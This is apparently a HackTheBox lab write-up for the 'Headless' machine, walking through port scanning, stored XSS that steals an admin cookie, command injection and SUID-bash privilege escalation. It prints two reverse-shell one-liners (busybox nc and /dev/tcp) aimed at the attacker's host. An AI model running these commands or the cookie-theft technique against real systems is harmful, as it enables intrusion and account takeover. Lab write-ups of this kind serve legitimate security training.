HackTheBox Writeup – Headless (Linux) – Easy Difficulty
Introduction
Another easy box to get started for my day. It’s been a long time since I’ve done an active machine that wasn’t a little bit harder than I needed it to be. A little client side XSS, a little command injection – like a light jog around the block.
Enumeration / Initial Foothold
I start off with some port scanning:
rustscan 10.10.11.8 --range 1-65535 -- -A -sC -sV | tee nmap.txt
But it only reveals ports 22 and 5000.
Visiting the website, we see a countdown timer:
The link for questions takes us to a support request.
We can see that it reflects our input in some capacity – a lead to XSS attacks.
I am able to reflect an XSS alert – that’s great, but it doesn’t take us very far.
Other members of the HackTheBox community told me I should be focusing on client side attacks. Since the error message says it’s forwarded to administrators, we can steal the administrator’s cookies with stored XSS that I took from HackTricks:
Put this after the host header.
When opened, the XSS loads our server and sends us the cookie.
We can then take that cookie and append it to our own requests – and go to /dashboard
Then we can execute a command injection using the “|” character.
I used a busybox shell to gain RCE, as nc mkfifo wasn’t working – busybox nc 10.10.14.2 9001 -e bash – however there are other utilities as well.
Privilege Escalation
After running Linux Smart Enumeration, I thought I was dreaming.
Yes, we have SUID bash – excellent! And we can easily use it to run any shell:
bash -i >& /dev/tcp/10.10.14.2/81 0>&1
Mission accomplished.
Lessons Learned
- Anything that gets “sent to the administrators” or similar should be considered a possible vector for client side attack.
- Insecure implementations should not be merely hidden behind authenticated access – even if they can’t be fixed, always consider defence in depth.
Song Of The Day – Self Control by Laura Branigan (1984)